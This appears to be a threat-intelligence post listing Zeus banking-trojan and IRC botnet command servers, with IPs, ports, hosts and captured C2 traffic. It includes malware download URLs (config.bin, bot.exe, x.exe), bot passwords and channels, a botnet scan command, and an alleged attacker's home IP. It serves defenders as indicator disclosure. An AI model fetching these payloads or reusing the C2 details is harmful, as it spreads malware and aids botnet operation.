ks3096360.kimsufi.com(zeus banking trojans hosted in France Ovh Systems)

ks3096360.kimsufi.com DNS_TYPE_A 94.23.232.121 Port Type 24477 tcp – HTTP Conversations: 94.23.232.121:80 – [ks3096360.kimsufi.com] Request: GET /Zeus/config.bin Response: 200 “OK” 74.125.224.146:80 – [www.google.com] Request: GET /webhp Response: 200 “OK” 94.23.232.121:80 – [ks3096360.kimsufi.com] Request: POST /Zeus/gate.php Response: 200 “OK” Request: POST /Zeus/gate.php Response: 200 “OK” EXE FILE: http://ks3096360.kimsufi.com/Zeus/bot.exe hosting infos: http://whois.domaintools.com/94.23.232.121

78.188.249.114(irc botnet hosted in Turkey Istanbul Turk Telekomunikasyon Anonim Sirketi)

Remote Host Port Number 78.188.249.114 7777 MODE {KnoX|USA|564335} -ix JOIN ##imbot## KCA PRIVMSG ##imbot## : Exe Rarl Dosyalara Ekleniyor. PONG HTTP1.4 NICK {KnoX|USA|564335} USER COMPUTERNAME * 0 :COMPUTERNAME Now talking in ##imbot## Topic 11 On 12: [ ##imbot## ] [ .rar ] Topic 11 By 12: [ KnX ] hosting infos: http://whois.domaintools.com/78.188.249.114

kjrub.com(zeus banking trojan hosted in United States Hostdime.com Inc)

isreali hecker using zeus botnet and rat kjrub.no-ip.org 46.120.170.54 this is home ip for sure Outgoing connection to remote server: kjrub.no-ip.org TCP port 101 Outgoing connection to remote server: kjrub.no-ip.org TCP port 99 Outgoing connection to remote server: kjrub.no-ip.org TCP port 1604 kjrub.com kjrub.com 64.37.52.109 Opened listening TCP connection on port: 39698 Download URLs http://64.37.52.109/Zeus/config.bin

itconsorcium.me(zeus banking trojan hosted in Netherlands Amsterdam Leaseweb B.v)

itconsorcium.me itconsorcium.me 85.17.65.10 Opened listening TCP connection on port: 39231Download URLs http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://85.17.65.10/system-updates/config.bin (itconsorcium.me) http://kenney.cz.cc/system-updates/bot.exe Outgoing connection to remote server: itconsorcium.me TCP port 80 Outgoing connection to remote server: itconsorcium.me TCP port 80 hosting infos: http://whois.domaintools.com/85.17.65.10

205.134.246.98(irc botnet hosted in United States Arlington Gamedata Inc)

Remote Host Port Number 205.134.246.98 9090 PASS prison 216.146.38.70 80 72.233.89.200 80 PRIVMSG {00-USA-XP-COMP-` =~@ :HTTP SET http://68.173.251.107/x.exe =~@ :SC// Sequential Port Scan started on 174.133.89.0:445 with a delay of 10 seconds for 0 minutes using 100 threads. PONG leaf.18632.com NICK {iNF-00-USA-XP-COMP-4138} USER MEAT * 0 :COMP JOIN ##hxxp## NICK {00-USA-XP-COMP-3086} JOIN ###meat hosting infos:

193.107.16.121(irc botnet hosted in Seychelles Ideal Solution Ltd)

Remote Host Port Number 193.107.16.121 1234 PASS xxx 204.0.5.51 80 216.178.38.224 80 63.135.80.46 80 66.220.149.32 80 MODE NEW-[USA|00|P|24666] -ix JOIN #!nw! test PONG 22 MOTD NICK NEW-[USA|00|P|24666] USER XP-4055 * 0 :COMPUTERNAME hosting infos: http://whois.domaintools.com/193.107.16.121

92.241.164.191(irc botnet hosted in Russian Federation Oao Webalta)

ip 92.241.164.191 port 8718 Nick taAODJGm User nftmukqp Channel #c Now 15 talking in #c Topic 11 On : [ #c ] [ =zHG1ItuZYjPiK9Yvp+PRGtG2f+HhKg4GOeRK3Pm1UmC51Uf+mWyMyq8raFlVl4bRGkmubSKgAUMpPQHZYWV1ORetyaFvLR ] Topic 11 By 12: [ term ] hosting infos: http://whois.domaintools.com/92.241.164.191

46.105.224.170(irc botnet hosted in France Ovh Systems)

Remote Host Port Number 213.251.170.52 80 46.105.224.170 6991 NICK New{US-XP-x86}5457206 USER 19245 “” “12420” :1586 MODE New{US-XP-x86}5457206 +iMm JOIN #FBI hosting infos: http://whois.domaintools.com/46.105.224.170

3vbot.no-ip.info(irc botnet hosted in Germany Hetzner Online Ag)

sexykyle.no-ip.biz Resolved : [ sexykyle.no-ip.biz ] To [ 178.63.140.212 ] Remote Host Port Number 178.63.140.212 1997 PASS none NICK NEW{USA-XP-SP3}{946345} USER 9463 “” “TsGh” :9463 JOIN #testbot PONG :irc.L1GhTs.net NICK New{US-XP-x86}5635115 USER 5635115 “” “5635115” :5635115 MODE New{US-XP-x86}5635115 +iMm JOIN #aryan none PONG :irc.L1GhTs.net hosting infos: http://whois.domaintools.com/178.63.140.212